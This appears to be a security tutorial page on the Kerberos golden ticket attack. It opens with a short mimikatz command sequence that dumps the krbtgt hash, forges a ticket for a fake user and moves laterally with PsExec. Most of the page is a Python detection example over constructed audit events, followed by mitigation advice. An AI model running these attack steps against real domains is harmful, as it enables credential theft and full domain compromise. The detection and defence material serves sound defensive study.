Golden ticket attack


Going back to the explanation of Kerberos authentication, we recall that when a user submits a request for a TGT, the KDC encrypts the TGT with a secret key known only to the KDCs in the domain. This secret key is the password hash of a domain account called krbtgt. Anyone who obtains the krbtgt password hash can therefore forge their own TGTs, known as golden tickets, for any user (including accounts that do not exist) without the KDC ever seeing the request.

  1. mimikatz.exe

  2. privilege::debug

  3. lsadump::lsa /patch
     (dumps the krbtgt NTLM hash from the DC)

  4. kerberos::purge

  5. kerberos::golden /user:<fakeuser> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt ntlm hash> /ptt

  6. misc::cmd
     With the golden ticket injected into memory, misc::cmd launches a new command prompt that uses it.

  7. psexec.exe \\<dc_machine> cmd.exe
     From that prompt, lateral movement with PsExec is attempted again.

  8. whoami

  9. whoami /groups
     (for verification)
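The property that makes a golden ticket work is also what gives it away: the forged TGT is never issued by a KDC, so a domain controller sees service-ticket requests (event 4769) for an account that has no matching TGT request (event 4768) on any DC, and the account named in the ticket may not exist in AD at all (the `/user:<fakeuser>` step above). The following is an added detection example written for this page, not part of the original cheat sheet or of any product. It runs over a handful of constructed audit events (not real logs) and assumes a hypothetical `KNOWN_ACCOUNTS` export of AD users; the 10-hour TGT lifetime is the default domain policy and should be replaced with your own.

```python
from datetime import datetime, timedelta

# Constructed sample Kerberos audit events (not real logs).
# 4768 = TGT requested from the KDC, 4769 = service ticket requested.
# A forged (golden) TGT never passes through the KDC, so the account shows
# 4769 activity with no 4768 on any domain controller in the domain.
EVENTS = [
    {"ts": "2024-05-01T08:00:00", "id": 4768, "account": "alice",     "dc": "DC01"},
    {"ts": "2024-05-01T08:05:00", "id": 4769, "account": "alice",     "dc": "DC01", "service": "cifs/FS01"},
    # carol's TGT came from DC02 but the service ticket from DC01: only
    # domain-wide correlation avoids a false positive here.
    {"ts": "2024-05-01T08:00:00", "id": 4768, "account": "carol",     "dc": "DC02"},
    {"ts": "2024-05-01T08:30:00", "id": 4769, "account": "carol",     "dc": "DC01", "service": "cifs/FS01"},
    # bob's last TGT is older than the maximum ticket lifetime.
    {"ts": "2024-05-01T07:30:00", "id": 4768, "account": "bob",       "dc": "DC02"},
    {"ts": "2024-05-01T20:00:00", "id": 4769, "account": "bob",       "dc": "DC01", "service": "cifs/FS01"},
    # fakeadmin never requested a TGT and is not an AD account.
    {"ts": "2024-05-01T09:10:00", "id": 4769, "account": "fakeadmin", "dc": "DC01", "service": "cifs/DC01"},
    {"ts": "2024-05-01T09:11:00", "id": 4769, "account": "fakeadmin", "dc": "DC02", "service": "host/DC02"},
]

KNOWN_ACCOUNTS = {"alice", "bob", "carol"}  # hypothetical export of AD user accounts
TGT_LIFETIME = timedelta(hours=10)          # default "Maximum lifetime for user ticket"


def find_suspicious_service_tickets(events, known_accounts=KNOWN_ACCOUNTS,
                                    tgt_lifetime=TGT_LIFETIME):
    """Return {account: [reasons]} for 4769 events that no KDC-issued TGT explains.

    Events from every DC must be pooled before calling this: a legitimate TGT
    is commonly issued by a different DC than the one later asked for a
    service ticket.
    """
    # account -> times at which a KDC actually issued a TGT
    tgt_times = {}
    for e in events:
        if e["id"] == 4768:
            tgt_times.setdefault(e["account"].lower(), []).append(
                datetime.fromisoformat(e["ts"]))

    findings = {}
    for e in events:
        if e["id"] != 4769:
            continue
        acct = e["account"].lower()
        t = datetime.fromisoformat(e["ts"])
        reasons = []
        if acct not in known_accounts:
            reasons.append("account does not exist in AD (%s on %s)" % (e["ts"], e["dc"]))
        # Is there any TGT, from any DC, issued at or before this request and
        # still within its maximum lifetime?
        covered = any(timedelta(0) <= t - issued <= tgt_lifetime
                      for issued in tgt_times.get(acct, []))
        if not covered:
            reasons.append("no TGT issued by any DC within %s before %s on %s"
                           % (tgt_lifetime, e["ts"], e["dc"]))
        if reasons:
            findings.setdefault(acct, []).extend(reasons)
    return findings


if __name__ == "__main__":
    for account, reasons in find_suspicious_service_tickets(EVENTS).items():
        print(account)
        for r in reasons:
            print("   ", r)
```

On the sample data, alice and carol are explained by a KDC-issued TGT, bob is flagged once because his only TGT is past its lifetime, and fakeadmin is flagged on both DCs for both reasons. The check is only as good as log coverage: if even one DC's 4768 events are missing, every user that authenticated there looks like fakeadmin, so aggregate all DCs first. Because the forged ticket stays valid for as long as the krbtgt hash it was signed with, the corresponding mitigation after a suspected compromise is to reset the krbtgt password twice (the KDC keeps the previous key, so a single reset still leaves old tickets valid).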
